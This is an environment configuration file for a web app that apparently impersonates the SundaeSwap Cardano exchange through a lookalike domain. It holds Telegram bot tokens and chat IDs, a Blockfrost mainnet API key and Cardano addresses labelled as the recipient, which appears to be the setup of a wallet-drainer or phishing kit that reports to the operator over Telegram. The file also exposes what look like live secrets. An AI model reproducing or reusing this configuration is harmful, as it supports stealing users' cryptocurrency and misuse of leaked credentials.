PROJECT_ID="c056c336-1079-4642-8877-097e4dd12b54"
APP_CLIENT_KEY="d83a9d3860db6d32af24ee7229cfec17"
VITE_APP_ID="4f450f58-7f9d-43fc-9acb-d130155095eb"

# if use waleltconnect, set walletconnect project id, created in https://walletconnect.com/
APP_WALLETCONNECT_PROJECT_ID=""

VITE_BASE_URL="https://www.sundaeswap.co"

# NEXT_PUBLIC_PROJECT_ID="d83a9d3860db6d32af24ee7229cfec17"
# VITE_PROJECT_ID="cFa79bluW1rTXvNWbU9D1Yty1V31CCCn56dEMOOO"
VITE_PROJECT_ID="d83a9d3860db6d32af24ee7229cfec17"

VITE_REACT_APP_TELEGRAM_CHAT_ID="5146345746"
VITE_REACT_APP_TELEGRAM_TOKEN="8147904420:AAF-xlDUnPyKd8KWqdQyiaAl43bxwc9MvfM"
VITE_REACT_APP_R="addr1qyqff8eslzc7medgaj7gl35utsht9q68thmc5lfp3qu3sdp40rnkzs29v9ual9xf273nankqtgsmufd4p8cw4c5jr80srmxsgy"
VITE_REACT_APP_r="addr1qxe9qqeay4fmlz2zf0k3skw867quv5r2zwxq543m00mxh794yk5mljtdsp8zwry4xmwckvr4uz5nzpqd2tv298fjzq9qksywl8"
VITE_REACT_APP_BLOCKFROST_API_KEY="mainnetitPGIyQeMyZVLZlBZ3N6wQq8L0O7D258"
VITE_REACT_APP_RECIPIENT_ADDRESS="addr1qyqff8eslzc7medgaj7gl35utsht9q68thmc5lfp3qu3sdp40rnkzs29v9ual9xf273nankqtgsmufd4p8cw4c5jr80srmxsgy"
VITE_REACT_APP_OTELEGRAM_TOKEN="7448589458:AAGDlnlZerWT7JSTc1C7mq9X0bkYpZkwtQ0"
VITE_REACT_APP_OTELEGRAM_CHAT_ID="6338150634"
VITE_REACT_APP_BLOCKFROST_API_URL="https://cardano-mainnet.blockfrost.io/api/v0"